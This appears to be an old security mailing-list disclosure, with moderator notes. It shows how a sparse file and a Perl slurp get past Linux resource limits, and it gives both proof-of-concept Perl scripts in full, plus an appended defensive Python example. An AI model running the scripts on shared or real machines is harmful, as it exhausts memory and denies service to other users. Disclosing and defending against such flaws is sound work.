
simple perl script bypasses limits



Any user with shell access, or with access to upload a CGI
script, can exploit this to make the machine thrash badly.

Seems to circumvent any limits in the kernel.

Here are my settings:
dlai whale home org:/home/dlai?limit
cputime         unlimited
filesize        20000 kbytes
datasize        8192 kbytes
stacksize       8192 kbytes
coredumpsize    1000000 kbytes
memoryuse       8192 kbytes
descriptors     1024 
memorylocked    8192 kbytes
maxproc         256 

Create a file with a huge hole (can be 4Gb if needed):
   [mod: 2Gb on linux. :-(   -- REW]

#!/usr/bin/perl
system("touch xxx");
open(XXX,"+<xxx");
seek(XXX,90000000,0);
print XXX "A B C\n";
truncate (XXX, 4294967295);
close(XXX);

This one creates a file size 90Megs, but it's really sparse.
"limit filesize" has no effect; this operation succeeds.  Understandable,
since the file really only occupies a few blocks on the disk.

Next, create a script that reads the file:

#!/usr/bin/perl
open(XXX,"<xxx");
@abc=<XXX>;
print "read\n";
exit;

Run it; it will circumvent any limit settings on datasize, stacksize,
memoryuse, memorylocked.  It really allocates 90Mb and uses it even
though my limits are set at 8Mb.


ps shows:

 6460 dlai      12   0 53608 8156    72 D       0 34.2 43.4   1:14 readx.pl

(I killed it before it ate all my swap - machine was thrashing badly at
this point).


And another note: on IRIX, the [create file] script fails to run; the kernel
detects that the limit for filesize is exceeded:

? x.pl
File size limit exceeded (core dumped)

[mod: Postscriptum in separate message merged by
moderator.... Verified on a 2.0 system -- REW]
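
Added example, not part of the original post: a defensive counterpart to the two scripts above, showing how a sparse file's apparent size differs from the blocks it occupies and how a reader can stay within a fixed memory budget instead of slurping the file. It is written in Python rather than the post's Perl; the function names, the 32 MB sample size and the 1 MB budget are assumptions made for the illustration.

```python
import os
import tempfile

def make_sparse(path, size):
    """Constructed sample input: `size` apparent bytes, one short line of real data."""
    with open(path, "wb") as f:
        f.write(b"A B C\n")
        f.truncate(size)  # extends the file with a hole; no data blocks are written

def size_report(path):
    """Return (apparent_bytes, allocated_bytes) for a file.

    st_blocks is counted in 512-byte units; it is what du and block quotas see.
    """
    st = os.stat(path)
    return st.st_size, st.st_blocks * 512

def count_lines_bounded(path, max_bytes, chunk=64 * 1024):
    """Count newlines while holding at most `chunk` bytes at a time.

    Raises ValueError once more than `max_bytes` have been read, so a hole
    (which reads back as zero bytes with no newline) cannot grow a buffer.
    """
    total = lines = 0
    with open(path, "rb") as f:
        while True:
            buf = f.read(chunk)
            if not buf:
                return lines
            total += len(buf)
            if total > max_bytes:
                raise ValueError(f"{path}: more than {max_bytes} bytes")
            lines += buf.count(b"\n")

def demo(size=32 * 1024 * 1024, budget=1024 * 1024):
    """Build a sparse file, report its sizes, and try a budgeted read."""
    with tempfile.TemporaryDirectory() as d:
        path = os.path.join(d, "xxx")
        make_sparse(path, size)
        apparent, allocated = size_report(path)
        try:
            count_lines_bounded(path, budget)
            refused = False
        except ValueError:
            refused = True
        return apparent, allocated, refused

if __name__ == "__main__":
    print(demo())  # (apparent size, allocated bytes, whether the read was refused)
```

The reader's memory cost follows the apparent size, not the allocated blocks, which is why a check based on disk usage alone does not bound it.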


